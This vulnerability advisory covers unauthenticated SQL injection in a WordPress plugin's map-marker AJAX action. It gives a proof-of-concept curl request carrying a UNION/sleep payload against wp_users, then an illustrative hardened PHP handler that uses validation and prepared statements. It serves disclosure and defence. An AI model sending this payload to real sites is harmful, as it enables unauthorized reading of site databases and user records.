Description
The plugin does not sanitise and escape a parameter before using it in a SQL statement reached through an AJAX action available to unauthenticated users, leading to SQL injection that can be exploited with UNION-based, time-based and error-based techniques.
curl --url 'http://vulnerable-site.tld/wp-admin/admin-ajax.php' --data 'action=w2dc_get_map_marker_info&locations_ids%5B%5D=1+UNION+SELECT+null%2C68%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Csleep(10)+FROM+wp_users&map_id=1&show_summary_button=1&show_readmore_button=1'
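How an unauthenticated AJAX handler can take a list of IDs without exposing this class of injection, as an added example that is not the plugin's own code or its actual fix. It assumes the injectable value is the array parameter carrying the IDs in the request above (`locations_ids[]`). The action name, function name, table and column names are hypothetical.

```php
<?php
// Added illustration: hypothetical handler, not the plugin's code.
// Runs inside WordPress, which provides $wpdb and the wp_* helpers.

add_action( 'wp_ajax_nopriv_example_get_marker_info', 'example_get_marker_info' );
add_action( 'wp_ajax_example_get_marker_info', 'example_get_marker_info' );

function example_get_marker_info() {
    global $wpdb;

    // Unsafe pattern of the kind the description refers to (assumed shape):
    // request data concatenated straight into the statement.
    // $sql = "SELECT id, title FROM t WHERE id IN (" . implode( ',', $_POST['locations_ids'] ) . ")";

    $raw = isset( $_POST['locations_ids'] ) ? wp_unslash( $_POST['locations_ids'] ) : array();
    if ( ! is_array( $raw ) ) {
        wp_send_json_error( 'locations_ids must be an array', 400 );
    }

    // Validate rather than coerce: anything that is not a plain run of
    // digits (for example "1 UNION SELECT ...") rejects the whole request.
    $ids = array();
    foreach ( $raw as $value ) {
        if ( ! is_string( $value ) || ! ctype_digit( $value ) ) {
            wp_send_json_error( 'Invalid location id', 400 );
        }
        $ids[] = (int) $value;
    }

    // Bound the work an anonymous caller can request.
    $ids = array_slice( array_values( array_unique( $ids ) ), 0, 100 );
    if ( empty( $ids ) ) {
        wp_send_json_success( array() );
    }

    // One %d placeholder per ID; the values are bound by prepare(),
    // never concatenated into the SQL text.
    $placeholders = implode( ',', array_fill( 0, count( $ids ), '%d' ) );
    $table        = $wpdb->prefix . 'example_locations'; // hypothetical table

    $sql  = $wpdb->prepare(
        "SELECT id, title FROM {$table} WHERE id IN ({$placeholders})",
        $ids
    );
    $rows = $wpdb->get_results( $sql, ARRAY_A );

    wp_send_json_success( $rows );
}
```

Strict validation and the prepared statement are independent layers: either one alone blocks the request shown above, and keeping both means a later change to one does not reopen the injection.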